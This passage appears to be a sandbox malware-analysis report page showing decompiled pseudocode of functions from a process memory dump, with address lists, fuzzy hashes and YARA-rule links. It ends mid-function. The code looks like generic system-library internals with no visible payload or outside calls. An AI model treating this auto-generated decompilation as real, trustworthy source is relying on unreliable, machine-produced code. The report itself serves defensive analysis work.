					_pop(_t323);
					_pop(_t255);
					return E1E3EB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E1E3E3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E1E3EB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x1e3c4128
0x1e3c4135
0x1e3c413c
0x1e3c4141
0x1e3c4145
0x1e3c4147
0x1e3c414e
0x1e3c4151
0x1e3c4159
0x1e3c415c
0x1e3c4160
0x1e3c4164
0x1e3c4168
0x1e3c416c
0x1e3c417f
0x1e3c4181
0x1e3c446a
0x1e3c446a
0x1e3c418c
0x1e3c4195
0x1e3c4199
0x1e3c4432
0x1e3c4439
0x1e3c443d
0x1e3c4442
0x1e3c4447
0x00000000
0x1e3c419f
0x1e3c41a3
0x1e3c41b1
0x1e3c41b9
0x1e3c41bd
0x1e3c45db
0x1e3c45db
0x00000000
0x1e3c41c3
0x1e3c41c3
0x1e3c41ce
0x1e3c41d4
0x1e40e138
0x1e40e13e
0x1e40e169
0x1e40e16d
0x1e40e19e
0x1e40e16f
0x1e40e16f
0x1e40e175
0x1e40e179
0x1e40e18f
0x1e40e193
0x00000000
0x1e40e199
0x00000000
0x1e40e199
0x1e40e193
0x00000000
0x00000000
0x00000000
0x1e3c41da
0x1e3c41da
0x1e3c41df
0x1e3c41e4
0x1e3c41ec
0x1e3c4203
0x1e3c4207
0x1e40e1fd
0x1e3c4222
0x1e3c4226
0x1e40e1f3
0x1e40e1f3
0x1e3c422c
0x1e3c422c
0x1e3c4233
0x1e40e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3c4239
0x1e3c4239
0x1e3c4239
0x1e3c4239
0x1e3c4233
0x1e3c4226
0x1e3c41ee
0x1e3c41ee
0x1e3c41f4
0x1e3c4575
0x1e40e1b1
0x1e40e1b1
0x00000000
0x1e3c457b
0x1e3c457b
0x1e3c4582
0x1e40e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3c4588
0x1e3c4588
0x1e3c458c
0x1e40e1c4
0x1e40e1c4
0x00000000
0x1e3c4592
0x1e3c4592
0x1e3c4599
0x1e40e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3c459f
0x1e3c459f
0x1e3c45a3
0x1e40e1d7
0x1e40e1e4
0x00000000
0x1e3c45a9
0x1e3c45a9
0x1e3c45b0
0x1e40e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3c45b6
0x1e3c45b6
0x1e3c45b6
0x00000000
0x1e3c45b6
0x1e3c45b0
0x1e3c45a3
0x1e3c4599
0x1e3c458c
0x1e3c4582
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3c41f4
0x1e3c423e
0x1e3c4241
0x1e3c45c0
0x1e3c45c4
0x00000000
0x1e3c45ca
0x1e3c45ca
0x00000000
0x1e40e207
0x1e40e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3c45d1
0x00000000
0x00000000
0x1e3c45ca
0x00000000
0x1e3c4247
0x1e3c4247
0x1e3c4247
0x1e3c4249
0x1e3c4249
0x1e3c4249
0x1e3c4251
0x1e3c4251
0x1e3c4257
0x1e3c425f
0x1e3c426e
0x1e3c4270
0x1e3c427a
0x1e40e219
0x1e40e219
0x1e3c4280
0x1e3c4282
0x1e3c4456
0x1e3c45ea
0x00000000
0x1e3c45f0
0x1e40e223
0x00000000
0x1e40e223
0x1e3c445c
0x1e3c445c
0x00000000
0x1e3c445c
0x00000000
0x1e3c4288
0x1e3c428c
0x1e40e298
0x1e3c4292
0x1e3c4292
0x1e3c429e
0x1e3c42a3
0x1e3c42a7
0x1e3c42ac
0x1e40e22d
0x1e3c42b2
0x1e3c42b2
0x1e3c42b9
0x1e3c42bc
0x1e3c42c2
0x1e3c42ca
0x1e3c42cd
0x1e3c42cd
0x1e3c42d4
0x1e3c433f
0x1e3c433f
0x1e3c42d6
0x1e3c42d6
0x1e3c42d9
0x1e3c42dd
0x1e3c42eb
0x1e40e23a
0x1e3c42f1
0x1e3c4305
0x1e3c430d
0x1e3c4315
0x1e3c4318
0x1e3c431f
0x1e3c4322
0x1e3c432e
0x1e3c433b
0x1e3c433b
0x00000000
0x1e3c432e
0x1e3c42eb
0x1e3c434c
0x1e3c434e
0x1e3c4352
0x1e3c4359
0x1e3c435e
0x1e3c4361
0x1e3c436e
0x1e3c438a
0x1e3c438e
0x1e3c4396
0x1e3c439e
0x1e3c43a1
0x1e3c43ad
0x1e3c43bb
0x1e3c43bb
0x1e3c43ad
0x1e3c436e
0x1e3c43bf
0x1e3c43c5
0x1e3c4463
0x1e3c4463
0x1e3c43ce
0x1e3c43d5
0x1e3c43d9
0x1e3c43df
0x1e3c4475
0x1e3c4479
0x1e3c4491
0x1e3c4491
0x1e3c4479
0x1e3c43e5
0x1e3c43eb
0x1e3c43f4
0x1e3c43f6
0x1e3c43f9
0x1e3c43fc
0x1e3c43ff
0x1e3c44e8
0x1e3c44ed
0x1e3c44f3
0x1e40e247
0x00000000
0x1e3c44f9
0x1e3c4504
0x1e3c4508
0x1e3c450f
0x1e40e269
0x00000000
0x1e3c4515
0x1e3c4519
0x1e3c4531
0x1e3c4534
0x1e3c4537
0x1e3c453e
0x1e3c4541
0x1e3c454a
0x1e40e255
0x1e40e255
0x1e40e25b
0x1e40e25e
0x1e40e261
0x1e40e261
0x1e3c4555
0x1e3c4559
0x1e3c455d
0x1e40e26d
0x1e40e270
0x1e40e274
0x1e40e27a
0x1e40e27d
0x1e40e28e
0x1e40e28e
0x1e3c4563
0x1e3c4563
0x1e3c4569
0x1e3c4569
0x00000000
0x1e3c455d
0x1e3c450f
0x00000000
0x1e3c44f3
0x1e3c43ff
0x1e3c4405
0x1e3c4405
0x1e3c4405
0x1e3c42ac
0x1e3c428c
0x1e3c4282
0x1e3c4407
0x1e3c440d
0x1e40e2af
0x1e40e2af
0x1e3c4413
0x1e3c4413
0x00000000
0x1e3c41d4
0x00000000
0x1e3c41c3
0x1e3c41bd
0x1e3c4415
0x1e3c4415
0x1e3c4416
0x1e3c4417
0x1e3c4429
0x1e3c416e
0x1e3c416e
0x1e3c4175
0x1e3c4498
0x1e3c449f
0x1e40e12d
0x00000000
0x1e40e133
0x00000000
0x1e40e133
0x1e3c44a5
0x1e3c44a5
0x1e3c44aa
0x00000000
0x1e3c44bb
0x1e3c44ca
0x1e3c44d6
0x1e3c44d7
0x1e3c44d8
0x1e3c44e3
0x1e3c44e3
0x1e3c44aa
0x1e3c417b
0x1e3c417b
0x1e3c417b
0x00000000
0x1e3c417b
0x1e3c4175
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20e427a648e830774bb15882ebeaab288558bd5b3981c85618b975f2929638b3
Instruction ID: 66d964714607f9c7f8e0cb53d725439a794c054f7944c0576d445e2491f4ab72
Opcode Fuzzy Hash: 20e427a648e830774bb15882ebeaab288558bd5b3981c85618b975f2929638b3
Instruction Fuzzy Hash: 62F15A74A182518BC714CF59C490A6AB7E6FF88714F154A2FF88ACB290E734ED91CB52

Uniqueness

Uniqueness Score: -1.00%

Function 1E3D20A0, Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E1E3D20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x1e498714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E1E3D2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E1E3D2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E1E3A58EC(_t240);
									_t221 =  *0x1e495cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x1e495cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E1E3E4A2C(0x1e496e40, 0x1e3e4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E1E3C7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x1e385c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E1E3DF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E1E3DF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E1E427016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L1E3C2400(_t267 + 0x20);
															}
															L1E3C2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E1E3D2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E1E3C2280(_t134, 0x1e498608);
									__eflags =  *0x1e496e48 - _t253; // 0x701090
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E1E3BFFB0(_t198, _t241, 0x1e498608);
										__eflags = _t253;
										if(_t253 != 0) {
											L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x1e496e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x1e498608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E1E3D6B90(_t210,  &_v64);
										_t262 =  *0x1e498608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E1E3DE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E1E3E97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E1E3E006A(0x1e498608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x1e498608);
												E1E3EB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x1e496904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x1e496e48; // 0x701090
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E1E3BFFB0(_t198, _t240, 0x1e498608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E1E3E00C2(0x1e498608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x1e3d20a0
0x1e3d20a8
0x1e3d20ad
0x1e3d20b3
0x1e3d20b8
0x1e3d20c2
0x1e3d20c7
0x1e3d20cb
0x1e3d20d2
0x1e3d2263
0x1e3d2266
0x1e415836
0x1e415836
0x00000000
0x1e3d226c
0x1e3d226c
0x1e3d2270
0x1e3d2274
0x1e3d20e2
0x1e3d20e2
0x1e3d20e6
0x1e3d20ee
0x1e4157dc
0x1e4157de
0x1e4157ec
0x1e4157ec
0x1e4157f1
0x1e4157f3
0x1e4157f8
0x00000000
0x1e4157f8
0x1e4157e0
0x1e4157e4
0x1e4157ea
0x00000000
0x00000000
0x00000000
0x1e4157ea
0x1e3d20f4
0x1e3d20f4
0x1e3d20f8
0x1e3d20f8
0x1e3d20fc
0x1e3d2100
0x1e3d2106
0x1e3d2201
0x1e3d2206
0x1e3d220b
0x1e3d220e
0x1e3d22a9
0x1e3d22ac
0x00000000
0x00000000
0x1e3d22b2
0x1e3d22b5
0x1e415801
0x1e415806
0x00000000
0x00000000
0x1e415810
0x1e415815
0x1e415818
0x00000000
0x00000000
0x1e41581e
0x1e3d22bb
0x1e3d22bb
0x1e3d2218
0x1e3d2218
0x1e3d221c
0x1e3d2220
0x1e3d2222
0x1e3d22c2
0x1e3d22c4
0x1e3d22dc
0x1e3d22dc
0x1e3d22e1
0x00000000
0x00000000
0x00000000
0x1e3d22e7
0x1e3d22c8
0x1e3d22cd
0x1e3d22d3
0x1e3d22d6
0x1e415823
0x1e415825
0x1e415827
0x00000000
0x00000000
0x1e41582d
0x00000000
0x1e41582d
0x00000000
0x1e3d2228
0x1e3d2228
0x00000000
0x1e3d2228
0x1e3d2222
0x1e3d2214
0x1e3d2214
0x00000000
0x1e3d2114
0x1e3d2114
0x1e3d2114
0x1e3d211a
0x1e3d211c
0x1e3d2348
0x1e3d234d
0x1e415840
0x1e415845
0x1e415848
0x1e41584e
0x1e41584e
0x1e415848
0x1e3d2353
0x1e3d2355
0x1e3d2388
0x1e3d2388
0x1e3d2368
0x1e3d236a
0x1e3d236c
0x1e3d238f
0x00000000
0x1e3d236e
0x1e3d236e
0x1e3d218e
0x1e3d218e
0x1e3d2191
0x1e3d2195
0x1e415a03
0x1e415a06
0x1e415a0c
0x1e415a0f
0x1e415a11
0x1e415a13
0x1e415a13
0x1e415a19
0x1e415a1f
0x00000000
0x1e3d219b
0x1e3d219b
0x1e3d21a0
0x1e3d2282
0x1e3d2284
0x1e3d2284
0x1e3d2284
0x1e3d2284
0x1e3d21a6
0x1e3d21a9
0x1e3d21ac
0x1e3d21ae
0x1e3d21b3
0x1e3d228b
0x1e3d2290
0x1e3d2379
0x1e3d2296
0x1e3d2298
0x1e3d2298
0x1e3d2290
0x1e3d21b9
0x1e3d21be
0x1e3d22a2
0x1e3d22a2
0x1e3d21c4
0x1e3d21c8
0x1e3d21cc
0x1e3d21d0
0x1e3d21d4
0x1e3d21de
0x1e3d21e3
0x1e415a29
0x1e415a2c
0x00000000
0x00000000
0x1e415a3b
0x00000000
0x1e3d21e9
0x1e3d21e9
0x1e3d21e9
0x1e3d21ee
0x1e3d21f1
0x1e415a45
0x1e415a4b
0x1e415a52
0x1e415a58
0x1e415a5d
0x1e415a5f
0x1e415a71
0x1e415a61
0x1e415a6a
0x1e415a6a
0x1e415a76
0x1e415a79
0x1e415a7f
0x1e415a83
0x1e415a85
0x1e415a87
0x1e415a87
0x1e415a8c
0x1e415a91
0x1e415a97
0x1e415a9f
0x1e415aa0
0x1e415aa1
0x1e415aa6
0x1e415aab
0x1e415ab1
0x1e415ab3
0x1e415ab9
0x1e415aca
0x1e415ad4
0x1e415ad4
0x1e415ade
0x1e415ade
0x1e415aab
0x1e415a79
0x1e415a52
0x1e3d21f7
0x1e3d21f9
0x1e3d21fe
0x1e3d21fe
0x1e3d21e3
0x1e3d2195
0x1e3d236c
0x1e3d2122
0x1e3d2122
0x1e3d2124
0x1e3d2231
0x1e3d2236
0x1e3d2236
0x1e3d2238
0x1e3d2238
0x1e3d2240
0x1e3d2242
0x1e3d2244
0x1e4159fc
0x1e3d218c
0x1e3d218c
0x00000000
0x1e3d218c
0x1e3d224a
0x1e3d224f
0x1e3d2256
0x1e3d2304
0x1e3d2309
0x1e3d230f
0x1e3d231e
0x1e3d231e
0x1e3d231e
0x1e3d2320
0x1e3d2325
0x1e3d232a
0x1e3d232c
0x1e3d233e
0x1e3d233e
0x00000000
0x1e3d232c
0x1e3d2311
0x1e3d2317
0x1e3d231a
0x1e3d231c
0x1e3d2380
0x1e3d2380
0x1e3d2380
0x1e3d2384
0x00000000
0x00000000
0x1e3d2386
0x00000000
0x1e3d231c
0x1e3d225c
0x1e3d225c
0x00000000
0x1e3d225c
0x1e3d212a
0x1e3d2134
0x1e3d2138
0x1e3d213d
0x1e415858
0x1e415863
0x1e415863
0x1e415867
0x1e41586a
0x00000000
0x00000000
0x1e41586c
0x1e41586c
0x1e415871
0x1e415875
0x1e415877
0x1e415997
0x1e41599c
0x1e4159a1
0x1e4159a7
0x1e4159a7
0x00000000
0x1e4159a7
0x1e41587d
0x00000000
0x1e41588b
0x1e41588b
0x1e415890
0x1e415892
0x1e415894
0x1e415899
0x1e41589b
0x1e4158a0
0x1e4158a0
0x1e4158aa
0x1e4158b2
0x1e4158b6
0x1e4158be
0x1e4158c6
0x1e4158c9
0x1e41590d
0x1e415917
0x1e41591a
0x1e41591c
0x1e415920
0x1e415928
0x1e41592a
0x1e41592c
0x1e41592e
0x1e41592e
0x1e4158cb
0x1e4158cd
0x1e4158d8
0x1e4158e0
0x1e4158f4
0x1e4158fe
0x1e4158fe
0x1e41593a
0x1e41593e
0x1e415940
0x1e415942
0x00000000
0x1e415944
0x1e415944
0x1e415949
0x1e41594e
0x1e41594e
0x1e415953
0x1e41595b
0x1e415976
0x1e415976
0x1e41597a
0x1e41597f
0x00000000
0x00000000
0x00000000
0x00000000
0x1e415981
0x1e415981
0x1e415981
0x1e415983
0x1e415988
0x1e41598d
0x1e415991
0x1e415991
0x00000000
0x1e41595d
0x1e41595d
0x1e415963
0x1e415965
0x00000000
0x00000000
0x00000000
0x00000000
0x1e415967
0x1e415967
0x1e41596b
0x1e41596d
0x00000000
0x00000000
0x1e41596f
0x1e415971
0x1e415971
0x1e415974
0x00000000
0x00000000
0x00000000
0x1e415974
0x00000000
0x1e415967
0x1e41595b
0x1e415942
0x1e415863
0x1e3d2143
0x1e3d2143
0x1e3d2149
0x1e3d214f
0x1e3d22f1
0x1e3d22f6
0x00000000
0x1e3d2173
0x1e3d2173
0x1e3d217d
0x1e3d2181
0x1e3d2186
0x1e4159ae
0x1e4159b2
0x1e4159b5
0x1e4159b7
0x1e4159ba
0x1e4159cd
0x1e4159d1
0x1e4159d5
0x1e4159d9
0x1e4159db
0x00000000
0x00000000
0x1e4159dd
0x1e4159dd
0x1e4159e1
0x1e4159e4
0x1e4159e7
0x1e4159ee
0x1e4159ee
0x1e4159f3
0x1e4159f3
0x00000000
0x1e3d2186
0x1e3d214f
0x1e3d2106
0x1e3d2266
0x1e3d20d8
0x1e3d20da
0x1e3d20e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75855bb6545a8c1c3c6eac40a7732e60f339133ea872f77b1f11d8d088ffa8f0
Instruction ID: 0894c606dbcced6f3b54fe8b63461358fe533190c7cae0ce0de803255c4534f0
Opcode Fuzzy Hash: 75855bb6545a8c1c3c6eac40a7732e60f339133ea872f77b1f11d8d088ffa8f0
Instruction Fuzzy Hash: 0EF1F832A183819FD715CF29C44075AB7E6BF85764F488B1EF8959B340D738E849CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1E3BB090, Relevance: .4, Instructions: 405
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E1E3BB090(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t117;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t134;
				signed int _t139;
				signed char _t143;
				signed int _t144;
				signed int _t146;
				signed int _t148;
				signed int* _t150;
				signed int _t152;
				signed int _t161;
				signed char _t165;
				signed int _t167;
				signed int _t170;
				signed int _t174;
				signed char _t177;
				signed int _t178;
				signed int _t181;
				signed int _t182;
				signed int _t187;
				signed int _t190;
				signed int _t192;
				signed int _t194;
				signed int _t196;
				signed int _t199;
				signed int _t202;
				signed int _t208;
				signed int _t211;

				_t182 = _a16;
				_t178 = _a8;
				_t161 = _a4;
				 *_t182 = 0;
				 *(_t182 + 4) = 0;
				_t5 = _t161 + 4; // 0x4
				_t117 =  *_t5 & 0x00000001;
				if(_t178 == 0) {
					 *_t161 = _t182;
					 *(_t161 + 4) = _t182;
					if(_t117 != 0) {
						_t117 = _t182 | 0x00000001;
						 *(_t161 + 4) = _t117;
					}
					 *(_t182 + 8) = 0;
					goto L43;
				} else {
					_t208 = _t182 ^ _t178;
					_t192 = _t208;
					if(_t117 == 0) {
						_t192 = _t182;
					}
					_t117 = _a12 & 0x000000ff;
					 *(_t178 + _t117 * 4) = _t192;
					if(( *(_t161 + 4) & 0x00000001) == 0) {
						_t208 = _t178;
					}
					 *(_t182 + 8) = _t208 | 0x00000001;
					if(_a12 == 0) {
